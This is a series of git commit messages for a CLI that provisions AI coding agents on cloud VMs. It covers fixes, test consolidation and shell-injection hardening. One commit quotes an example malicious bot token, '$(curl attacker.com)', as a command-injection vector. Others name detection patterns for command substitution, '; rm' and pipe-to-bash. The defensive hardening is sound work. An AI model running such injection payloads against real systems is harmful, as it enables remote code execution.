* fix: move Telegram/WhatsApp channel setup to after gateway starts
OpenClaw's `channels add` and `channels login` commands require a running
gateway. Previously, Telegram token configuration ran in setupOpenclawConfig
(pre-gateway) using `openclaw config set`, causing the gateway to hang on
startup when a token was present for a disabled-by-default plugin.
Now:
- Plugin enables stay in setupOpenclawConfig (pre-gateway)
- Channel config (token add, QR login) runs in orchestrate.ts step 11c
after the gateway is up, using `openclaw channels add/login`
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* security: use shellQuote instead of jsonEscape for Telegram token
jsonEscape uses JSON.stringify which produces double-quoted strings that
the shell interprets, creating a command injection vector. shellQuote
wraps in single quotes, preventing shell interpretation.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* chore: fix biome export ordering in interactive.ts and manifest.ts
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
* feat: add --beta images for DO marketplace images
Gate pre-built DigitalOcean marketplace images behind --beta images.
When active, uses hardcoded marketplace slugs (e.g. openrouter-spawnclaude)
instead of fresh Ubuntu + cloud-init, skipping agent install entirely.
All 8 images verified working via e2e smoke test (2026-03-13).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: sort exports to satisfy biome organizeImports
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
GCP e2-micro VMs are slow and throttled. When the openclaw gateway is
killed during the resilience test, the lock file is held by the dead
process for ~5s. This causes the first systemd restart attempt to fail
with "lock timeout after 5000ms", requiring a second restart cycle.
Timeline on slow VMs: RestartSec(5) + lock-timeout(5) + RestartSec(5)
+ boot(5) ≈ 20s. The previous 30s window was too tight — the gateway
DID recover but just barely missed the polling window on throttled CPUs.
Increasing to 60s gives a comfortable 3x margin for all VM types.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Added a note regarding the public anonymous survey and clarified that it is not a security vulnerability.
Signed-off-by: L <6723574+louisgv@users.noreply.github.com>
* feat: add `spawn feedback` subcommand
Sends anonymous feedback to the Spawn team via PostHog survey API.
Usage: spawn feedback "your message here"
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix: update feedback survey ID and response key
Use the correct PostHog survey ID and $survey_response property.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix: use asyncTryCatch instead of try/catch in feedback command
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude <claude@anthropic.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Remove 5 unused underscore-prefixed parameters that were accepted but
never read: extractFlagValue._flagLabel, performUpdate._remoteVersion,
reportDownloadFailure._primaryUrl/_fallbackUrl, buildRecordLabel._manifest,
and setupCodexConfig._apiKey. All callers updated accordingly.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
"should reject heredoc syntax in operator combinations" tested a single
case ("Input << EOF") that is fully covered by the broader "should reject
heredoc syntax" test (3 cases: << EOF, <<- HEREDOC, <<MARKER).
1 test removed, 0 expect() calls lost (the exact input pattern is covered
by the remaining test).
-- qa/dedup-scanner
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Add groups:history and groups:read OAuth scopes plus message.groups
event subscription so SPA can respond in private channels.
Co-authored-by: Claude <claude@anthropic.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Consolidated 11 redundant it() blocks in fuzzy-key-matching.test.ts:
- merged 3 separate distance-1 edit-type tests (deletion/insertion/substitution)
into one data-driven it() that also covers distance-2
- merged distance-0/1/2/3/4 threshold tests into one parameterized assertion
- merged mirrored resolveAgentKey + resolveCloudKey describe blocks (8 its → 4)
No expect() calls were removed (3644 total preserved); 11 tests consolidated.
-- qa/dedup-scanner
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Defense-in-depth: wrap sanitized TERM values in single quotes in all
four SSH-based cloud modules (aws, hetzner, digitalocean, gcp). The
allowlist in sanitizeTermValue() already prevents injection, but quoting
the interpolated value adds a second layer of protection.
Also extends test coverage with additional injection vectors (pipes,
redirects, variable expansion, empty strings) and a test verifying the
complete allowlist.
Fixes#2577
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The manifest.json aws.defaults.bundle said "medium_3_0" ($20/mo) but
the code in aws/aws.ts defaults to "nano_3_0" ($3.50/mo). This field
is displayed to users during --dry-run preview via buildCloudLines(),
so the mismatch was user-facing. The advertised AWS price of "$3.50/mo"
also confirms nano_3_0 is the intended default.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
The "should match at exactly distance 3" test in findClosestMatch was
using "clau" as input (distance 2 from "claude"), which was identical
to the "should match at distance 2" test immediately below it.
Fixed by using "cla" as input, which is genuinely distance 3 from "claude"
(requires inserting u, d, e), correctly testing the threshold boundary.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
- Remove stale top-level `discovery.sh` reference from CLAUDE.md file
structure (the file was never in the repo; actual script lives at
`.claude/skills/setup-agent-team/discovery.sh`)
- Fix `autonomous-loops.md` rule that referenced `./discovery.sh --loop`
with the correct path to the actual discovery script
No functional code changes. All 1400 tests pass, biome lint clean.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Remove --beta <feature> row from the commands table in README — this flag is
not listed in getHelpUsageSection() in commands/help.ts, which is the source
of truth for the commands table.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
PR #2567 fixed the openclaw modelDefault in code but missed the manifest
interactive_prompts field. Also update discovery.md Hetzner entry from
the old CX22/€3.29 to the current cx23/€3.49.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Adds a "None" option at the top of the setup options multiselect
prompt, pre-selected by default. This fixes two UX issues:
1. Users can now explicitly skip all setup steps by selecting "None"
(or pressing Enter with it pre-selected) — previously impossible
once another option was selected.
2. Arrow keys now respond immediately because multiple items are
available to navigate from the start.
Strips the __none__ sentinel from the returned step set so no
behavioural change occurs when the user selects "None".
Fixes#2569
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Each `openclaw config set` does a read-modify-write on the config file,
which can drop fields written by uploadConfigFile — including
gateway.auth.token. This caused the OpenClaw dashboard to return
"Unauthorized" on every fresh deploy.
Fix: after the browser config set and plugin enable blocks, re-set
gateway.auth.token via `openclaw config set` (same non-fatal pattern as
the existing Telegram token call), ensuring the token survives all
read-modify-write cycles.
Fixes#2570
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
When multiple machines ran `spawn claude aws`, they all registered their
SSH public key under the hardcoded name "spawn-key". The second machine
would find the key already exists and skip import — but the instance got
provisioned with Machine A's key, causing Permission denied on all SSH
retries for Machine B.
Fix: derive the key pair name from the first 8 hex chars of SHA256 of
the public key content (e.g. `spawn-key-a1b2c3d4`). Different machines
get different key names, eliminating the collision entirely.
Fixes#2565
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Telegram and WhatsApp plugins are disabled by default in OpenClaw.
Setting a bot token without enabling the plugin causes the gateway
to hang on startup. Running `openclaw channels login --channel
whatsapp` without the plugin enabled fails with "Unsupported channel".
Now runs `openclaw plugins enable telegram/whatsapp` before any
channel configuration. Also adds step-by-step instructions for
getting a Telegram bot token from @BotFather.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
The model ID `openrouter/openrouter/auto` had a double `openrouter/` prefix
which failed validateModelId() (requires exactly one slash in provider/model
format). This caused the model to be silently ignored on every OpenClaw
launch, falling back to no model default.
Fix: use the correct `openrouter/auto` model ID in both modelDefault field
and the fallback in setupOpenclawConfig().
Fixes#2566
Agent: issue-fixer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The --model flag was listed twice in two user-facing outputs:
- help.ts USAGE section: lines 11 and 20 both showed --model <id>
with different descriptions
- index.ts unknown-flag error: lines 118 and 121 both showed --model
with different descriptions
Both duplicates were introduced when --model support was added.
Combined the two entries into one clear line each.
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
jsonEscape() produces double-quoted strings ("value") which allow
shell command substitution $(...) inside bash. A malicious
TELEGRAM_BOT_TOKEN like "$(curl attacker.com)" would execute on
the remote VM when openclaw config is set.
shellQuote() uses POSIX single-quote escaping which prevents all
shell expansion. Every other user-supplied value in agent-setup.ts
(GITHUB_TOKEN, git user.name, git user.email) correctly uses
shellQuote — the bot token was the only exception.
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
HeadlessOptions is defined and used internally in commands/run.ts but
re-exported from commands/index.ts with no consumer — index.ts imports
cmdRunHeadless but passes options inline without importing the type.
This is a CLI binary, not a library, so unused re-exports add surface
area without value.
Also move the run.ts comment to be adjacent to the run.ts exports.
Bump CLI version to 0.17.4.
-- qa/code-quality
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
- Consolidate 4 separate SPAWN_PROMPT/SPAWN_MODE env var tests in
cmdrun-happy-path.test.ts into 2 tests. Each previously spawned a
separate bash subprocess to check a single env var; the consolidated
tests check both vars in one subprocess invocation, halving overhead.
- Remove redundant KNOWN_FLAGS.has() assertions from steps-flag.test.ts.
The findUnknownFlag() call already exercises the Set membership check —
the extra .has() assertion was pure duplication. Also removes the now-
unused KNOWN_FLAGS import.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
New users don't know how to get a bot token. Show instructions
before the prompt: open @BotFather, send /newbot, copy the token.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
ZeroClaw's latest GitHub release (v0.1.9a) ships no binary assets.
The --prefer-prebuilt bootstrap path hits a 404, falls back to Rust
source compilation, and exceeds the 600s install timeout — causing
zeroclaw to fail on all clouds (digitalocean, gcp, hetzner, sprite).
Fix: replace the bootstrap invocation with a direct curl download from
v0.1.7-beta.30 (the last release that ships linux-gnu prebuilt binaries)
into ~/.local/bin. This completes in seconds vs ~20 minutes for a source
build, and removes the swap-space setup step that was only needed for
memory-intensive compilation.
Also remove the now-unused ensureSwapSpace function and update the E2E
verify check to also look in ~/.local/bin for the zeroclaw binary.
-- qa/e2e-tester
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
PickOption, PickConfig, and PickResult interfaces in picker.ts were exported
but never imported by any external module. SpawnConfig type in spawn-config.ts
was similarly exported but not used outside the module. Made all four private
to reduce the public API surface.
Bump CLI patch version to 0.17.2.
-- qa/code-quality
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Dead backwards-compat re-export left over from the shellQuote
consolidation (PRs #2533, #2535, #2546). Zero consumers import
shellQuote from gcp/gcp.ts — all correctly import from shared/ui.ts.
Per CLAUDE.md: avoid backwards-compatibility hacks; delete unused code.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Remove 2 tests from the manifest-integrity.test.ts "structure" describe
block that can never fail:
- "should parse as valid JSON": manifest.json is already parsed via
JSON.parse() at module scope (line 23). If parsing fails, the module
throws and ALL tests fail — this individual test can never provide
an independent failure signal.
- "should have agents, clouds, and matrix top-level keys": after parsing,
Object.keys(manifest.agents/clouds) and Object.entries(manifest.matrix)
are called at module scope (lines 25-27). If those properties were
missing, the module load itself would throw. This test is also guaranteed
to pass whenever any test in the file runs.
Removing these 2 theatrical tests leaves 1403 tests (down from 1405).
All remaining tests provide real signal.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* feat: add Telegram and WhatsApp options to OpenClaw setup picker
Adds separate "Telegram" and "WhatsApp" checkboxes to the OpenClaw
setup screen:
- Telegram: prompts for bot token from @BotFather, injects into
OpenClaw config via `openclaw config set`
- WhatsApp: reminds user to scan QR code via the web dashboard
after launch (no CLI setup possible)
Updates USER.md with channel-specific guidance when either is selected.
Bump CLI version to 0.16.16.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: run WhatsApp QR scan interactively before TUI launch
Instead of punting WhatsApp setup to "after launch", runs
`openclaw channels login --channel whatsapp` as an interactive SSH
session between gateway start and TUI launch. The user scans the
QR code with their phone during provisioning setup.
Flow: gateway starts → tunnel set up → WhatsApp QR scan → TUI launch
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: update WhatsApp hint to reflect pre-TUI QR scanning
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add --config and --steps CLI flags for programmatic setup
Add --config <path> flag to load spawn options from a JSON config file
(model, steps, name, setup data like telegram_bot_token). Add --steps
<list> flag for comma-separated setup step control. Both enable the
web UI and headless automation to control which setup steps run.
Priority order: CLI flags > --config file > env vars > defaults.
- New spawn-config.ts module with valibot validation
- OptionalStep extended with dataEnvVar and interactive metadata
- validateStepNames() for step name validation with warnings
- Telegram setup reads TELEGRAM_BOT_TOKEN env var before prompting
- WhatsApp auto-skipped in headless mode with warning
- promptSetupOptions() skipped when SPAWN_ENABLED_STEPS already set
- E2E verify helpers for github, browser, telegram setup artifacts
- QA reference file documenting all agent setup options
- Version bump to 0.17.0
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add --model flag and priority order tests
- Add --model <id> CLI flag that sets MODEL_ID env var
- --model is extracted before --config so it takes priority
- Add config-priority.test.ts with 8 tests verifying:
- --model overrides config model
- --steps overrides config steps
- --steps "" disables all steps
- --name overrides config name
- Config tokens apply as defaults
- Explicit env vars override config tokens
- Remove preferences.json from priority order docs (not needed)
- Add --model to help text and unknown-flag guidance
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* docs: add --model, --config, --steps to README
Document config file format, setup steps table, and new CLI flags
in the commands table.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review feedback
- Move null byte check before path resolution (defense-in-depth)
- Move agent-setup-options.md from .claude/rules/ to .docs/ (git-ignored)
per documentation policy
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: resolve rebase conflicts and deduplicate --model flag extraction
Rebase on main introduced a duplicate --model flag extraction block
(one from the PR at line 804, one from main at line 941). Consolidated
into the single early extraction point with -m shorthand support.
Also removed duplicate --model entry from KNOWN_FLAGS set.
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Set every agent's featured_cloud to ["digitalocean", "sprite"] — one
primary recommendation (DigitalOcean) and one fallback (Sprite).
Co-authored-by: Claude <claude@anthropic.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
- soak.sh: SOAK_CLOUD env var makes cloud configurable (default: sprite)
- qa.sh: load TELEGRAM_BOT_TOKEN, TELEGRAM_TEST_CHAT_ID, SOAK_CLOUD from
/etc/spawn-qa-auth.env in soak mode
- qa.yml: add weekly Monday 3am UTC scheduled soak trigger
- fix: bun eval → bun -e across soak.sh, key-request.sh, github-auth.sh
(bun eval is not a valid subcommand in bun 1.3.9)
- fix: export _TOKEN via env prefix so process.env._TOKEN works in bun -e
- docs: update shell-scripts.md rule to say bun -e (not bun eval)
Verified: 3/4 Telegram tests pass in smoke test on DigitalOcean (120s wait)
getMe ✓ sendMessage ✓ getWebhookInfo ✓; cron test needs full 55-min window.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
The previous PR (#2536) set the Codex default to gpt-5.1-codex, but the
latest available on OpenRouter is gpt-5.3-codex. Also adds a rules file
documenting each agent's default model to prevent future regressions.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Adds --model / -m CLI flag to override the agent's default LLM model:
spawn codex gcp --model openai/gpt-5.3-codex
Also supports persistent per-agent model preferences via config file at
~/.config/spawn/preferences.json:
{ "models": { "codex": "openai/gpt-5.3-codex" } }
Priority: --model flag > preferences file > agent default.
This enables a future web UI to pass model selection via CLI args when
invoking spawn programmatically to provision machines.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Junie was added as a fully implemented agent (manifest, agent scripts,
agent-setup.ts) but the packer/tarball pipeline was never updated.
This meant the nightly agent-tarballs workflow could not build a
pre-built tarball for Junie, forcing all deployments to do a live
npm install.
- Add junie entry to packer/agents.json (tier: node, @jetbrains/junie-cli)
- Add junie to capture-agent.sh allowlist and path-capture case
(npm-based, same as codex/kilocode — captures /root/.npm-global/)
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Remove redundant existsSync check inside icon-integrity "is actual PNG
data" tests — the file existence is already verified in the preceding
test, and isPng() will throw if the file is missing.
Remove the "should detect multiple dangerous patterns" test from
validatePrompt — it retests the same $(…), backtick, ; rm, and |bash/sh
patterns that each have their own dedicated it() block immediately above.
Fix misleading test description: "should accept scripts with comments
containing dangerous patterns" — the test actually expects a throw
(documented as a known trade-off). Rename to "should reject…".
Removes 1 test (1381 → 1380) and 18 expect() calls.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* security: add DO_CLIENT_SECRET env var override
Allows users/organizations to supply their own DigitalOcean OAuth
client secret via DO_CLIENT_SECRET env var rather than relying on
the bundled default. The bundled secret remains as fallback.
Fixes#2537
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* chore: bump CLI version to 0.16.19
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Three root-cause bugs in input test functions:
1. Stdin pass-through broken: cloud_exec uses "printf '...' | base64 -d | bash"
on the remote, meaning bash reads the script from its own stdin — not the
outer process's stdin. "PROMPT=$(base64 -d)" inside the script was reading
from the already-consumed pipe, always producing an empty prompt.
Fix: embed the base64-encoded prompt directly in the remote command string.
Base64 output is [A-Za-z0-9+/=] only — safe to embed in single-quoted strings.
2. Zeroclaw flag wrong: "zeroclaw agent -p" was passing the prompt as
--provider (not --prompt). The correct flag for non-interactive single-message
mode is "-m"/"--message".
3. Codex model stale: "openai/gpt-5-codex" does not exist on OpenRouter.
Updated to "openai/gpt-5.1-codex" which is available.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
PR #2533 hardened GCP with shellQuote() and null-byte rejection, but
left Hetzner, DigitalOcean, AWS, and connect.ts using inline
.replace(/'/g, "'\\''") without null-byte validation.
- Move shellQuote to shared/ui.ts as the single source of truth
- Add null-byte validation to runServer in Hetzner, DO, and AWS
- Replace inline shell escaping with shellQuote in interactiveSession
across all clouds, connect.ts, and agents.ts buildEnvBlock
- Re-export shellQuote from gcp.ts for backwards compatibility
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Consolidate 9 per-credential-type it() blocks in prompt-file-security.test.ts
into a single data-driven test covering all 17 sensitive path patterns.
Merge 2 validatePromptFileStats "accept" tests into one.
Consolidate 4 unicode/encoding-attack it() blocks in security.test.ts
into a single data-driven test. Merge 3 "accept identifier" it() blocks into one.
Removes 19 redundant tests (1400 → 1381) with no loss of coverage.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
- Add null-byte rejection to shellQuote (defense-in-depth)
- Export shellQuote for testability
- Refactor interactiveSession to use shellQuote instead of inline escaping
- Add comprehensive test suite for shellQuote security properties
Fixes#2529
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Consolidate 8 fragmented pipe-to-bash/sh tests in validatePrompt into 2
data-driven tests covering all inputs (with/without whitespace, complex
pipelines, and standalone word acceptance). Merge 3 backtick tests into 1.
Merge 2 whitespace tests into 1. Removes 19 lines of duplicate test setup.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
The identical generateCsrfState() helper existed in both
digitalocean/digitalocean.ts and shared/oauth.ts. Export it from
oauth.ts (which digitalocean.ts already imports) and remove the
duplicate copy.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
Add base64 character validation ([A-Za-z0-9+/=]) before use in SSH
command strings for gcp.sh, aws.sh, and hetzner.sh cloud_exec
functions -- matching the existing fix in digitalocean.sh (#2528).
Also add a validated _encode_b64 helper to soak.sh and use it for
all Telegram bot token encoding, preventing corrupted base64 from
breaking out of single-quoted SSH command strings.
Closes#2527
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Add explicit base64 character validation in _digitalocean_exec after
encoding the command, matching the existing pattern in provision.sh.
This ensures the encoded value contains only [A-Za-z0-9+/=] before
embedding it in the SSH command string.
Note: #2527 (provision.sh base64 validation) was already fixed in a
prior commit — the validation at lines 284-289 already rejects
non-base64 characters and empty output.
Fixes#2526
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Replace `if (!r.ok) { expect(...) }` and `if (result.ok) { return }` guards
with unconditional assertions using toThrow() or toMatchObject(). These
conditional blocks silently skipped assertions when the condition evaluated
the wrong way, providing false confidence. Also remove now-unused tryCatch
imports from prompt-file-security.test.ts and security.test.ts.
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
* test: add cron-triggered Telegram reminder to soak test
Tests OpenClaw's ability to stay alive and execute scheduled tasks.
Installs a one-shot cron on the VM before the 1h soak wait that sends
a Telegram message at ~55 min, then verifies the message was sent
after the wait completes. Also moves Telegram config injection before
the soak wait so the cron can use the bot token immediately.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* test: use OpenClaw's cron scheduler instead of system crontab
Replaces the raw system cron approach with OpenClaw's built-in cron
scheduler (`openclaw cron add`). This properly tests that OpenClaw's
gateway stays alive after 1 hour and can execute scheduled tasks.
The test now:
1. Injects Telegram config + schedules an OpenClaw cron job (--at +55min)
2. Waits 1 hour (soak)
3. Verifies the job fired via `openclaw cron runs` and `openclaw cron list`
Uses --delete-after-run for one-shot semantics. Verification checks both
the run history and the auto-deletion as proof of execution.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* test: verify cron message on Telegram side via forwardMessage
Instead of trusting OpenClaw's self-reported cron status, we now verify
the message actually exists in the Telegram chat:
1. Extract message_id from OpenClaw's cron execution logs (tries
`openclaw cron runs`, then ~/.openclaw/cron/ directory)
2. Call Telegram's forwardMessage API with that message_id
3. If Telegram can forward it → message EXISTS in the chat (proof
from Telegram itself, not OpenClaw)
This catches cases where OpenClaw reports success but the message
never actually reached Telegram.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: address security review findings in soak test
- Add validate_positive_int() and validate SOAK_WAIT_SECONDS +
SOAK_CRON_DELAY_SECONDS at startup (prevents command injection via
crafted env vars)
- Validate TELEGRAM_TEST_CHAT_ID is numeric in soak_validate_telegram_env
- Use per-app marker file /tmp/.spawn-cron-scheduled-${app} to avoid
race conditions when multiple soak tests run on the same VM
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>